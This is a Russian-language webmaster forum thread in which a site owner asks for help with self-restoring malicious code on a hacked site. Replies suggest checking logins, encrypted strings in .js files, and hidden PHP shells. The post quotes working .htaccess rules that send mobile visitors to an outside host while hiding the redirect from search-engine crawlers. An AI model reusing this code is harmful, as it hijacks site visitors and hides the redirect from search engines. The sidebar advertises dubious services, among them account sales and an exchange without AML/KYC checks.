Странный вирус на сайте (самовосстанавливающийся)
Страницы: 1
Странный вирус на сайте (самовосстанавливающийся), .htaccess (мобильная переадресация)
Доброго времени суток уважаемые форумчане. Столкнулся с проблемой: случайно заметил вредоносный код на сайте, который располагался в файле .htaccess, оказалось, что это вредоносный код, содержимое:
Цитата


RewriteEngine   on
RewriteCond    %{HTTP_USER_AGENT}  (android|midp|j2me|symbian|series\ 60|symbos|windows\ mobile|windows\ ce|ppc|smartphone|blackberry|mtk|bada|windows\ phone)  [NC]
RewriteCond    %{HTTP_USER_AGENT}  !(accoona|ia_archiver|antabot|ask\ jeeves|baidu|dcpbot|eltaindexer|feedfetcher|gamespy|gigabot|googlebot|gsa-crawler|grub-client|gulper|slurp|mihalism|msnbot|worldindexer|ooyyo|pagebull|scooter|w3c_validator|jigsaw|webalta|yahoofeedseeker|yahoo!\ slurp|mmcrawler|yandexbot|yandeximages|yandexvideo|yandexmedia|yandexblogs|yandexaddurl|yandexfavicons|yandexdirect|yandexmetrika|yandexcatalog|yandexnews|yandeximageresizer)    [NC]
RewriteRule    (.*)    http://mr-update.com/u/6484    [L,R=302]

Код при удалении автоматически восстанавливается. Хостер посоветовал сменить данные FTP, обновить движки, проверить свой PC на наличие вирусов, просмотреть лишние файлы на фтп. Все это выполнил - результата 0, код по-прежнему восстанавливается, более того на хостинге 16 сайтов ираспространяется код на все сайты (движки на сайтах разные). Суть кода такова- мобильная переадресация. Яндекс начал банить сайты, трафик резко упал, теперь с яндекса 1-2 перехода, при 100-200 до взлома. Пожалуйста помогите решить данную проблему...
Заработок на продаже качественных ссылок 16.540 р. ежемесячно Сайт: ТИЦ 10»ТУТ« + СКРИНШОТЫ! Не SAPE!
посмотрите логи входа на аккаунт , может нет толку от смены фтп, у вас сам аккаунт взломан, либо почта
просмотрите все ваши .js файлы, как правило в самом низу есть зашифрованная сторка, нужно чистить сразу все, иначе он так и будет распространятся
Изменено: Сергей Макаренко - 16 Декабря 2012 14:08
Неделю назад таким же  маялся.  Помимо перенаправлений в htaccess,  нашёл PHP Shell на сайте у себя, генерировал по 15 невидимых ссылок на всех страницах на какой-то американский сайт по кредитам. Пришлось просить хостера сделать откат и конечно сменить все пароли-логины фттп.
revisium.com/ai/]Сдесь не смотрели? Мне помогло найти дыру на сайте.
Пол года назад такое было. Жалко не могу пример привести. Влезла зараза в код яндекс метрики и где-то ещё сверху, вот уже не помню что..ищите отличие от бекапа. Всё почистил, убил уйму времени, всё сменил, что можно было и живёт сайт. Хостер тоже сказал, что с вирусом пришло, а касперский мой значит проспал.
Компьютер проверьте хорошо. У меня скорее всего через почту прилетело. Будет заскакивать каждый раз, когда входить в fttp будете под логином.
Страницы: 1
Похожие темы:
Читают тему (гостей: 1, пользователей: 0, из них скрытых: 0)
Новые темыОбъявленияСвободное общение
20:41 adsense в 2026: кто реально выводит копейку через киргизию? 
20:38 Очередной взлом через плагин. Хакеры получают админку без пароля 
19:29 Раскрутка форума 
18:53 AI под надзором. Минцифры готовят клеймо для контента 
17:17 Яндекс Нейро и выдача в 2026 - остались ли лазейки для маленьких сайтов? 
13:54 Как поймать партнера на «сливе» бренда? 
10:50 Альтернативы Адсенсу в 2026 - есть живые? 
15:33 GhostRocket.pro — Взлетаем в новую эру криптообмена! 
14:36 Продам жирный аккаунт fl.ru 
14:07 Продам аккаунты Gmail USA IP | Gmail MIX IP | Outlook Old 
12:54 Mixmasters - Exchange without AML and KYC 
12:31 Сервис ReCaptcha 2, 30р за 1000 решений. 
12:08 Продвижение YouTube видео в топ поиска | Любой тип контента | Гарантия результата 
12:06 Trustpilot Reviews | Подниму рейтинг вашей компании 
19:01 8 марта: желаю аптайма 99.9% и e-e-a-t без локов 
18:51 Огородники 
16:47 Какой фильм вы любите посмотреть перед сном? 
15:46 молодильные яблоки и живая вода 
10:11 О природе путешествий. 
01:47 Точные прогнозы на футбол 
15:04 Сайты Рунета